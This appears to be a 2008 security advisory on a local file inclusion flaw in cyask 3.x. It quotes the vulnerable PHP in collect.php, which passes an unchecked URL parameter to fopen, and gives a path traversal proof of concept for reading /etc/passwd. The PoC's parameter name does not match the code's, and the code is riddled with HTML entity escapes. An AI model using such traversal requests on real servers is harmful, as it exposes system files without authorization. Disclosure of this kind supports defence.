cyask 3.x Local File Inclusion Vulnerability

2008-09-2000:00:00

vulners.com

JSON

This vulnerability leads to that the attacker can read any file on your webserver when it installs cyask.

The $neturl variable in collect.php is short of enough check. When the attacker registers a new user, he can pass the user
check and then submit any filename to $neturl so that collect.php can read it.

The vuln code like this:
$url=get_referer();
$neturl=empty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']);

$collect_url=empty&#40;$neturl&#41; ? $url : $neturl;

$contents = &#39;&#39;;
if&#40;$fid=@fopen&#40;$collect_url,&quot;r&quot;&#41;&#41;
{
    do
    {
        $data = fread&#40;$fid, 4096&#41;;
        if &#40;strlen&#40;$data&#41; == 0&#41;
        {
            break;
        }
        $contents .= $data;
    }
    while&#40;true&#41;;
    fclose&#40;$fid&#41;;
}

POC:
http://XXX.com/collect.php?net_url=../../../etc/passwd

JSON